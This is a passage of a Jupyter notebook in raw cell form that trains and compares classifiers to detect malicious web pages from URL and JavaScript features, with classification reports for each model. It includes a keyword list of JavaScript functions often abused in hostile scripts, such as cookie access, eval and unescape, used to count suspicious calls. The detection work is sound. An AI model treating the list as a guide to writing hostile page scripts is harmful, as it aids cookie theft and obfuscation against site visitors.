"dataset_20_supp = pd.concat([dataset_20, dataset_supp], axis=0)",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning:\n\nSorting because non-concatenation axis is not aligned. A future version\nof pandas will change to not sort by default.\n\nTo accept the future behavior, pass 'sort=False'.\n\nTo retain the current behavior and silence the warning, pass 'sort=True'.\n\n\n"
],
[
"dataset_20_supp.head(1)",
"_____no_output_____"
],
[
"dataset_20_supp['content'] = dataset_20_supp['content'].fillna('could not fetch content')",
"_____no_output_____"
]
],
[
[
"### Get Malicious JS function count",
"_____no_output_____"
]
],
[
[
"def get_malicious_js_function_count(content):\n function_list = [\n 'setcookie', 'getcookie', 'createxmlhttprequest', 'unescape',\n 'document.write', 'element.appendchild', 'dateobject.togmtstring',\n 'new activexobject', 'document.createelement', 'getappname',\n 'getuseragent', 'window.setinterval', 'window.settimeout',\n 'location.assign', 'location.replace', 'eval()', 'string.indexof',\n 'string.fromcharcode', 'string.charat', 'string.split',\n 'string.charcodeat', 'document.writeln', 'document.appendchild',\n 'element.innerhtml'\n ]\n\n split_content = content.split(' ')\n counter = 0\n for element in split_content:\n if any(m_function in element.lower() for m_function in function_list):\n counter += 1\n\n return counter",
"_____no_output_____"
],
[
"dataset_20_supp['malicious_func_count'] = dataset_20_supp['content']\\\n.progress_apply(lambda content: get_malicious_js_function_count(content))",
"100%|██████████| 1330215/1330215 [15:08<00:00, 1463.80it/s]\n"
]
],
[
[
"### Get total and external URL count in content",
"_____no_output_____"
]
],
[
[
"def find_urls(string, ext_count):\n with timeout(1):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex, string)\n if ext_count:\n return len(set(url))\n return len(url)\n\n\n# Test Code\nstring = 'My Profile: https://auth.geeksforgeeks.org/user/Chinmoy%20Lenka/articles in the portal of http://www.geeksforgeeks.org/'\nprint(\"Urls: \", find_urls(string, False))\nprint(find_urls(dataset_20_supp['content'].iloc[-2000], False))",
"Urls: 2\n43\n"
],
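[
"# Note (our reading of the code): with ext_count=True the function returns the\n# number of *distinct* regex matches, which is the value stored in\n# 'ext_url_count' below; with ext_count=False it counts every match.\ndup = 'see http://a.com and http://a.com and http://b.com'\nprint(find_urls(dup, False))  # 3 matches in total\nprint(find_urls(dup, True))   # 2 distinct matches",
"_____no_output_____"
],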
[
"dataset_20_supp['total_url_count'] = dataset_20_supp['content'].progress_apply(\n lambda content: find_urls(str(content), False)\n)",
"100%|██████████| 1330215/1330215 [04:32<00:00, 4886.73it/s] \n"
],
[
"dataset_20_supp['ext_url_count'] = dataset_20_supp['content'].progress_apply(\n lambda content: find_urls(str(content), True)\n)",
"100%|██████████| 1330215/1330215 [04:40<00:00, 4735.37it/s] \n"
]
],
[
[
"## Dataset Sample",
"_____no_output_____"
]
],
[
[
"good_samples = dataset_20_supp[dataset_20_supp['label'] == 'good'].sample(46418, random_state=41)\nbad_samples = dataset_20_supp[dataset_20_supp['label'] == 'bad'].sample(46418, random_state=41)\n\ndataset_20_sample = pd.concat([good_samples, bad_samples], axis=0)",
"_____no_output_____"
]
],
[
[
"## Checkpoint 1: Preprocessed supplemented dataset",
"_____no_output_____"
]
],
[
[
"# dataset_20_supp.to_csv('supplemented_dataset_20.csv', index=False)\n# dataset_20_sample.to_csv('supplemented_dataset_20_training_sample.csv', index=False)",
"_____no_output_____"
],
[
"dataset_20_supp = pd.read_csv('datasets_of_interest/supplemented_dataset_20.csv')\ndataset_20_sample = pd.read_csv('./datasets_of_interest/supplemented_dataset_20_training_sample.csv')",
"_____no_output_____"
],
[
"dataset_20_supp.columns",
"_____no_output_____"
],
[
"dataset_20_sample['label'].value_counts()",
"_____no_output_____"
]
],
[
[
"## Normalizing ",
"_____no_output_____"
]
],
[
[
"from sklearn import preprocessing\nto_keep = dataset_20_supp.drop(\n columns=['url', 'ip_add', 'content', 'hostname', 'js_obf_len', 'label']).columns[::-1]\n\nx = dataset_20_supp[dataset_20_supp['label'] == 'bad'][to_keep].copy() #returns a numpy array\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x.values)\ndf_to_plot_malicious = pd.DataFrame(x_scaled)\ndf_to_plot_malicious.columns = dataset_20_supp[to_keep].columns\ndf_to_plot_malicious['label'] = 1.0\n\nx = dataset_20_supp[dataset_20_supp['label'] == 'good'][to_keep].copy() #returns a numpy array\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(x.values)\ndf_to_plot_benign = pd.DataFrame(x_scaled)\ndf_to_plot_benign.columns = dataset_20_supp[to_keep].columns\ndf_to_plot_benign['label'] = 0.0\n\ndf_to_plot = pd.concat([df_to_plot_malicious, df_to_plot_benign], axis=0)",
"_____no_output_____"
],
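[
"# MinMaxScaler rescales each column to [0, 1] via (x - min) / (max - min).\n# Tiny sketch, independent of the dataframes above:\ntoy = np.array([[1.0], [3.0], [5.0]])\nprint(preprocessing.MinMaxScaler().fit_transform(toy).ravel())  # [0.  0.5 1. ]",
"_____no_output_____"
],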
[
"df_to_plot['label'].value_counts()",
"_____no_output_____"
],
[
"dataset_20_supp['content'][1]",
"_____no_output_____"
]
],
[
[
"## Feature analysis",
"_____no_output_____"
]
],
[
[
"features = dataset_20_supp.drop(columns=['url', 'label', 'ip_add', 'content', \n 'hostname', 'js_obf_len']).columns[::-1]\nlen(features)",
"_____no_output_____"
],
[
"features = dataset_20_supp.drop(columns=['url', 'label', 'ip_add', 'content', \n 'hostname', 'js_obf_len']).columns[::-1]\n#df_to_plot = dataset_20_supp\n\nn_bins = 40\n\nfig, axs = plt.subplots(4, 4, figsize=(20,20))\n\n# We can set the number of bins with the `bins` kwarg\nfeature_counter = 0\nfor i in range(len(axs)):\n for j in range(len(axs[i])): \n current_feature = df_to_plot[features[feature_counter]]\n axs[i, j].hist(current_feature[df_to_plot['label']==0.0], n_bins, fc=(0, 1, 0, 0.5))\n axs[i, j].hist(current_feature[df_to_plot['label']==1.0], n_bins, fc=(1, 0, 0, 0.5))\n axs[i, j].set_title(f'Feature: {features[feature_counter]}')\n if features[feature_counter] == 'js_len':\n axs[i, j].set_ylim([0, current_feature.value_counts().iloc[0]]) \n else:\n axs[i, j].set_ylim([0, max(current_feature.value_counts())]) \n feature_counter += 1\n if feature_counter > 14:\n break\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Plotly analysis",
"_____no_output_____"
]
],
[
[
"dataset_20_sample.columns",
"_____no_output_____"
],
[
"feature = 'malicious_func_count'\ndataset_to_plot = dataset_20_sample\n\ngood_filter = dataset_to_plot[feature][dataset_to_plot['label'] == 'good']#.progress_apply(lambda x: roundup(x))\nbad_filter = dataset_to_plot[feature][dataset_to_plot['label'] == 'bad']#.progress_apply(lambda x: roundup(x))\n\n\n# bad_filter = bad_filter[bad_filter!=bad_filter.max()]\n\ntrace1 = go.Histogram(\n x=good_filter,\n name='Benign',\n yaxis='y2'\n\n)\n\ntrace2 = go.Histogram(\n x=bad_filter,\n name='Malicious',\n yaxis='y2'\n)\n\nfig = make_subplots(specs=[[{\"secondary_y\": True}]])\nfig.add_trace(trace1)\nfig.add_trace(trace2,secondary_y=True)\n\nfig['layout'].update(height = 500, width = 800, title = f'Feature: {feature}',xaxis=dict(tickangle=-90))\niplot(fig)",
"_____no_output_____"
]
],
[
[
"## Train-test-split",
"_____no_output_____"
]
],
[
[
"X = dataset_20_sample.drop(columns = ['label'])\ny = np.array(dataset_20_sample['label'].apply(lambda x: 1 if 'bad' in x else 0))",
"_____no_output_____"
],
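[
"# Label convention used from here on: 1 = malicious ('bad'), 0 = benign ('good').\nprint(pd.Series(['bad', 'good', 'bad']).apply(lambda x: 1 if 'bad' in x else 0).tolist())  # [1, 0, 1]",
"_____no_output_____"
],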
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)",
"_____no_output_____"
],
[
"original_features = ['url', 'url_len', 'ip_add', 'js_len',\n 'tld', 'who_is', 'https', 'content']\n\nto_drop = ['url', 'content', 'ip_add', 'hostname', 'js_obf_len', 'total_url_count', 'ext_url_count']\n\n## Variation 1\nX_train_original_features = np.array(X_train[original_features].drop(columns=['url', 'content', 'ip_add']))\nX_test_original_features = np.array(X_test[original_features].drop(columns=['url', 'content', 'ip_add']))\n\n## Variation 2\nX_train_original_features_remove_js = np.array(X_train[original_features]\\\n.drop(columns=['js_len'])\\\n.drop(columns=['url', 'content', 'ip_add']))\n\nX_test_original_features_remove_js = np.array(X_test[original_features]\\\n.drop(columns=['js_len'])\\\n.drop(columns=['url', 'content', 'ip_add']))\n\n## Variation 3\nX_train_custom_features = np.array(X_train.drop(columns=to_drop))\nX_test_custom_features = np.array(X_test.drop(columns=to_drop))\n\n## Variation 4\nX_train_custom_features_without_js = np.array(X_train.drop(columns = ['malicious_func_count', \n 'num_js_func_calls', 'js_len'])\\\n .drop(columns=to_drop))\nX_test_custom_features_without_js = np.array(X_test.drop(columns = ['malicious_func_count', \n 'num_js_func_calls', 'js_len'])\\\n .drop(columns=to_drop))\n\n## Variation 5\nX_train_transformer = X_train['url']\nX_test_transformer = X_test['url']",
"_____no_output_____"
]
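,
[
"# Sanity check on the four numeric feature variations (shapes only); assumes\n# the cell above has been run.\nfor name, arr in [('v1', X_train_original_features),\n                  ('v2', X_train_original_features_remove_js),\n                  ('v3', X_train_custom_features),\n                  ('v4', X_train_custom_features_without_js)]:\n    print(name, arr.shape)",
"_____no_output_____"
]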
],
[
[
"## Naive Bayes",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9274 0.9356 0.9315 15376\n malicious 0.9345 0.9262 0.9304 15260\n\n accuracy 0.9309 30636\n macro avg 0.9310 0.9309 0.9309 30636\nweighted avg 0.9310 0.9309 0.9309 30636\n\n"
]
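,
[
"# Cross-check: precision and recall for the 'malicious' class derived directly\n# from the confusion matrix (rows = true labels, columns = predictions).\ntn, fp, fn, tp = confusion_matrix(y_test, y_pred).ravel()\nprint('precision:', tp / (tp + fp), ' recall:', tp / (tp + fn))",
"_____no_output_____"
]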
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8792 0.7832 0.8285 15376\n malicious 0.8032 0.8916 0.8451 15260\n\n accuracy 0.8372 30636\n macro avg 0.8412 0.8374 0.8368 30636\nweighted avg 0.8414 0.8372 0.8368 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.7876 0.9757 0.8716 15376\n malicious 0.9678 0.7348 0.8354 15260\n\n accuracy 0.8557 30636\n macro avg 0.8777 0.8553 0.8535 30636\nweighted avg 0.8773 0.8557 0.8536 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"gnb = GaussianNB()\ngnb.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = gnb.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.5312 0.9705 0.6866 15376\n malicious 0.8215 0.1369 0.2347 15260\n\n accuracy 0.5553 30636\n macro avg 0.6763 0.5537 0.4606 30636\nweighted avg 0.6758 0.5553 0.4615 30636\n\n"
]
],
[
[
"## SVM",
"_____no_output_____"
]
],
[
[
"param_grid = {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.0001], 'kernel': ['rbf']}",
"_____no_output_____"
]
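,
[
"# Sketch of how the grid above could be used (kept commented out because a full\n# search is slow on this data; presumably how the C=1000, gamma=0.001 used in\n# the cells below were chosen):\n# clf = GridSearchCV(svm.SVC(), param_grid, n_jobs=-1, cv=3, verbose=3)\n# clf.fit(X_train_original_features, y_train)\n# print(clf.best_params_)",
"_____no_output_____"
]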
],
[
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_original_features, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9431 0.9800 0.9612 15376\n malicious 0.9791 0.9404 0.9594 15260\n\n accuracy 0.9603 30636\n macro avg 0.9611 0.9602 0.9603 30636\nweighted avg 0.9610 0.9603 0.9603 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(np.array(X_train_original_features_remove_js), np.array(y_train))",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8645 0.8401 0.8521 15376\n malicious 0.8433 0.8673 0.8551 15260\n\n accuracy 0.8536 30636\n macro avg 0.8539 0.8537 0.8536 30636\nweighted avg 0.8539 0.8536 0.8536 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_custom_features, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9796 0.9832 0.9814 15376\n malicious 0.9830 0.9794 0.9812 15260\n\n accuracy 0.9813 30636\n macro avg 0.9813 0.9813 0.9813 30636\nweighted avg 0.9813 0.9813 0.9813 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"svm_model = svm.SVC(C=1000, gamma=0.001, verbose=3)\n# clf = GridSearchCV(svm_model, param_grid, n_jobs=-1, cv=3, verbose=3)\n\nsvm_model.fit(X_train_custom_features_without_js, y_train)",
"[LibSVM]"
],
[
"# print(clf.best_params_)\n# print(clf.best_estimator_)",
"_____no_output_____"
],
[
"y_pred = svm_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8741 0.8534 0.8636 15376\n malicious 0.8557 0.8761 0.8658 15260\n\n accuracy 0.8647 30636\n macro avg 0.8649 0.8648 0.8647 30636\nweighted avg 0.8650 0.8647 0.8647 30636\n\n"
]
],
[
[
"## KNN",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9231 0.9722 0.9470 15376\n malicious 0.9704 0.9184 0.9437 15260\n\n accuracy 0.9454 30636\n macro avg 0.9467 0.9453 0.9453 30636\nweighted avg 0.9467 0.9454 0.9453 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8400 0.8125 0.8260 15376\n malicious 0.8171 0.8440 0.8304 15260\n\n accuracy 0.8282 30636\n macro avg 0.8285 0.8283 0.8282 30636\nweighted avg 0.8286 0.8282 0.8282 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9538 0.9818 0.9676 15376\n malicious 0.9811 0.9521 0.9664 15260\n\n accuracy 0.9670 30636\n macro avg 0.9675 0.9669 0.9670 30636\nweighted avg 0.9674 0.9670 0.9670 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"knn_model = KNeighborsClassifier(n_neighbors=100)\nknn_model.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = knn_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8176 0.8219 0.8197 15376\n malicious 0.8196 0.8153 0.8174 15260\n\n accuracy 0.8186 30636\n macro avg 0.8186 0.8186 0.8186 30636\nweighted avg 0.8186 0.8186 0.8186 30636\n\n"
]
],
[
[
"## XGBoost",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_original_features, y_train)",
"[18:30:03] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9593 0.9830 0.9710 15376\n malicious 0.9824 0.9580 0.9700 15260\n\n accuracy 0.9705 30636\n macro avg 0.9709 0.9705 0.9705 30636\nweighted avg 0.9708 0.9705 0.9705 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_original_features_remove_js, y_train)",
"[18:30:05] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8715 0.8559 0.8636 15376\n malicious 0.8574 0.8729 0.8650 15260\n\n accuracy 0.8643 30636\n macro avg 0.8644 0.8644 0.8643 30636\nweighted avg 0.8645 0.8643 0.8643 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier()\nxgboost_model.fit(X_train_custom_features, y_train)",
"[18:30:06] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9892 0.9912 0.9902 15376\n malicious 0.9911 0.9891 0.9901 15260\n\n accuracy 0.9902 30636\n macro avg 0.9902 0.9902 0.9902 30636\nweighted avg 0.9902 0.9902 0.9902 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"xgboost_model = XGBClassifier(learning_rate=0.4)\nxgboost_model.fit(X_train_custom_features_without_js, y_train)",
"[18:30:07] WARNING: /Users/travis/build/dmlc/xgboost/src/learner.cc:1095: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.\n"
],
[
"y_pred = xgboost_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8842 0.8812 0.8827 15376\n malicious 0.8807 0.8837 0.8822 15260\n\n accuracy 0.8825 30636\n macro avg 0.8825 0.8825 0.8825 30636\nweighted avg 0.8825 0.8825 0.8825 30636\n\n"
]
],
[
[
"## Adaboost",
"_____no_output_____"
],
[
"### Variation 1 - Original Dataset",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_original_features, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_original_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9416 0.9787 0.9598 15376\n malicious 0.9776 0.9389 0.9578 15260\n\n accuracy 0.9588 30636\n macro avg 0.9596 0.9588 0.9588 30636\nweighted avg 0.9596 0.9588 0.9588 30636\n\n"
]
],
[
[
"### Variation 2 - Original Dataset with JS features removed",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_original_features_remove_js, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_original_features_remove_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8755 0.8321 0.8533 15376\n malicious 0.8389 0.8807 0.8593 15260\n\n accuracy 0.8563 30636\n macro avg 0.8572 0.8564 0.8563 30636\nweighted avg 0.8573 0.8563 0.8563 30636\n\n"
]
],
[
[
"### Variation 3 - Original Dataset + Custom Features",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier()\nadaboost_model.fit(X_train_custom_features, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_custom_features)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.9730 0.9812 0.9771 15376\n malicious 0.9809 0.9725 0.9767 15260\n\n accuracy 0.9769 30636\n macro avg 0.9769 0.9769 0.9769 30636\nweighted avg 0.9769 0.9769 0.9769 30636\n\n"
]
],
[
[
"### Variation 4 - Original Dataset without JS Features + Custom Features",
"_____no_output_____"
]
],
[
[
"adaboost_model = AdaBoostClassifier(learning_rate=0.4)\nadaboost_model.fit(X_train_custom_features_without_js, y_train)",
"_____no_output_____"
],
[
"y_pred = adaboost_model.predict(X_test_custom_features_without_js)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
],
[
"confusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"print(classification_report(y_test, y_pred, target_names=['benign', 'malicious'], digits=4))",
" precision recall f1-score support\n\n benign 0.8794 0.8396 0.8590 15376\n malicious 0.8454 0.8839 0.8643 15260\n\n accuracy 0.8617 30636\n macro avg 0.8624 0.8618 0.8616 30636\nweighted avg 0.8625 0.8617 0.8616 30636\n\n"
]
],
[
[
"## JavaScript Validation using tools",
"_____no_output_____"
]
],
[
[
"dataset_20['content'].iloc[0].split('()')",
"_____no_output_____"
],
[
"# js_content = dataset_20['content']\n\n# pbar = tqdm(len(js_content))\n# for index, content in enumerate(js_content):\n# with open(f'./js_dataset_20/{index}_content.js', 'w') as f:\n# f.write(content)\n# pbar.update(1)\n# pbar.close()",
"_____no_output_____"
]
],
[
[
"## Dataset Supplementation",
"_____no_output_____"
]
],
[
[
"phishtank_data = pd.read_csv('phishtank.csv')\nphishtank_data.head()",
"_____no_output_____"
]
],
[
[
"## Transformers ",
"_____no_output_____"
]
],
[
[
"# # Preparing train data\n# train_data = [\n# [\"Aragorn was the heir of Isildur\", 1],\n# [\"Frodo was the heir of Isildur\", 0],\n# ]\n# train_df = pd.DataFrame(train_data)\n# train_df.columns = [\"text\", \"labels\"]\n\n# # Preparing eval data\n# eval_data = [\n# [\"Theoden was the king of Rohan\", 1],\n# [\"Merry was the king of Rohan\", 0],\n# ]\n# eval_df = pd.DataFrame(eval_data)\n# eval_df.columns = [\"text\", \"labels\"]",
"_____no_output_____"
],
[
"transformer_df = dataset_20_supp[['url', 'label']]\ntransformer_df['label'] = transformer_df['label'].apply(lambda x: 1 if 'bad' in x else 0)\n# transformer_df['url'] = transformer_df['url'].apply(lambda x: x.replace('...', ''))",
"/Users/ahmadchaiban/opt/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:2: SettingWithCopyWarning:\n\n\nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n\n"
],
[
"train_trans_df, test_trans_df = train_test_split(transformer_df, test_size=0.33, random_state=42)",
"_____no_output_____"
],
[
"model_args = ClassificationArgs(num_train_epochs=2, train_batch_size=256)\n\n# Create a ClassificationModel\nmodel = ClassificationModel(\n \"distilbert\", \"distilbert-base-cased\", args=model_args, use_cuda=False)\n\n# # Train the model\n# model.train_model(train_trans_df)\n\n# Evaluate the model\nresult, model_outputs, wrong_predictions = model.eval_model(test_trans_df)",
